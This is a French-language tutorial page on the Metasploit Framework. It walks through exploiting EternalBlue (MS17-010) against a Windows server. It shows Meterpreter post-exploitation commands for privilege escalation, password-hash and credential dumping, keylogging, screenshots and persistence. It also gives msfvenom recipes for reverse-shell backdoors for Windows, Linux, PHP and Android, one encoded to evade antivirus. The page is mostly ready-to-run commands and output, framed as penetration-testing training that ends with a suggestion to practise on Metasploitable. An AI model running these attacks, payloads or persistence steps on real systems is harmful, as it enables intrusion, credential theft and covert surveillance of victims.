Metasploit : Framework d'Exploitation Complet

Metasploit : Framework d'Exploitation Complet

Metasploit Framework

Metasploit est le framework de tests d'intrusion le plus utilisé au monde.

Démarrage

# Lancer msfconsole
msfconsole

# Bannière ASCII + chargement modules

Commandes de Base

# Rechercher exploits
msf6 > search ms17-010

# Utiliser un exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Afficher options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Configurer
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Vérifier vulnérabilité
msf6 exploit(windows/smb/ms17_010_eternalblue) > check

# Exploiter
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Meterpreter

# Informations système
meterpreter > sysinfo
Computer        : WIN-SERVER01
OS              : Windows Server 2016
Architecture    : x64
System Language : fr_FR
Meterpreter     : x64/windows

# Utilisateur actuel
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# Processus
meterpreter > ps

# Navigation fichiers
meterpreter > pwd
C:\Windows\system32

meterpreter > ls
meterpreter > cd C:\Users
meterpreter > download fichier.txt
meterpreter > upload backdoor.exe

# Réseau
meterpreter > ipconfig
meterpreter > route
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.10

# Élévation privilèges
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

# Dump credentials
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > load kiwi
meterpreter > creds_all

# Persistance
meterpreter > run persistence -X -i 60 -p 4444 -r 192.168.1.5

# Capture écran
meterpreter > screenshot

# Keylogger
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Génération Payloads

# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > backdoor.exe

# Linux ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > backdoor.elf

# PHP Web Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f raw > shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -o backdoor.apk

# Encodé (contourner AV)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

Multi-Handler

# Configurer listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.5
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j

# Session en arrière-plan
[*] Started reverse TCP handler on 192.168.1.5:4444

Scénario : Exploitation EternalBlue

# Étape 1 : Recherche
msf6 > search ms17-010

# Étape 2 : Configuration
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Étape 3 : Check
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 192.168.1.10:445 - The target is vulnerable.

# Étape 4 : Exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Sending stage (200262 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened

# Étape 5 : Post-exploitation
meterpreter > getsystem
meterpreter > hashdump
meterpreter > screenshot

Conclusion

Metasploit est essentiel pour les tests d'intrusion. Pratiquez sur Metasploitable2/3.

#Kali Linux #Metasploit

Commentaires (0)

Connectez-vous pour rejoindre la discussion.